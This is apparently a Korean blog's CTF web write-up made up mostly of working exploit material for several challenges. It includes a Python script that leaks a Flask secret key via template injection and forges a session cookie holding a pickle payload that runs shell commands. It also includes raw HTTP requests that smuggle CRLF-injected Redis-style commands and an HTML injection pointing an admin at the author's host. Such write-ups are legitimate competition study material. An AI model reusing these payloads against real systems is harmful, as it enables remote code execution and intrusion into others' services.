#-*- coding: utf-8 -*-
import sys
from hashlib import sha1
from flask.sessions import session_json_serializer
from itsdangerous import URLSafeTimedSerializer
import requests
import pickle
import base64
import __builtin__
import re
def getKey():
url = "http://3.112.201.75:8001/gg"
headers = {"Referer":"http://3.112.201.75:8001/{{config}}"}
c = requests.get(url,headers=headers).text
p = re.compile("b'.*?,")
print "Secret_key =" + p.findall(c)[0][:-1].replace("'","'")
def getFlag(key):
if key == "":
print "No Input Key"
exit()
secret_key = key # input
s = URLSafeTimedSerializer(
secret_key, salt='cookie-session',
serializer=session_json_serializer,
signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1}
)
class exploit(object):
def __reduce__(self):
p = "__import__('os').popen('cat flag').read()"
return (__builtin__.eval, (p,))
payload = base64.b64encode(pickle.dumps([{"date": "123", "text": "555", "title": exploit()}]))
session_data = {"savedata":payload}
session = s.dumps(session_data)
print "[*] Encrypted Session is = " + session
url = "http://3.112.201.75:8001/"
headers = {"Cookie":"session="+session}
c = requests.get(url,headers=headers).text
p = re.compile("zer0pts.*}")
print "[*]Flag = " + p.findall(c)[0]
session_key = getKey()
session_key = b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'
getFlag(session_key)
Can You Guess It?
Payload = http://3.112.201.75:8003/index.php/config.php/%81?source=1
URL Scan
payload
1) Flag Setting
POST / HTTP/1.1
Host: 18.179.178.246:8004
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
url=url=abcd%0d%0arename%20flag%201234567890aabbce%0d%0asetrange%201234567890aabbce%207%20'_'%20%0d%0asetrange%201234567890aabbce%2035%20'_'%20
2) Get Flag
http://18.179.178.246:8004/?p=1234567890aabbce
MusicBlog
Payload
POST /new_post.php HTTP/1.1
Host: 18.179.178.246:8005
Content-Length: 123
Cache-Control: max-age=0
Origin: http://18.179.178.246:8005
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://18.179.178.246:8005/new_post.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=5b54a2f98b67bde15fdfadf26f4c256d
Connection: close
title=bbsss&content=[["><a/udio href="http://my_ip" id="like">]]
'CTF > Writeup' 카테고리의 다른 글
| Christmas CTF 2019 Write up (4) | 2019.12.30 |
|---|---|
| ASIS CTF 2019 Final Web Write up (0) | 2019.11.18 |
| CCE(사이버공격방어대회) 2019 Write up (0) | 2019.09.29 |
| InCTF 2019 Web Write up (0) | 2019.09.23 |
| CSAW CTF 2019 Web Write up (0) | 2019.09.16 |
JeonYoungSin
메모 기록용 공간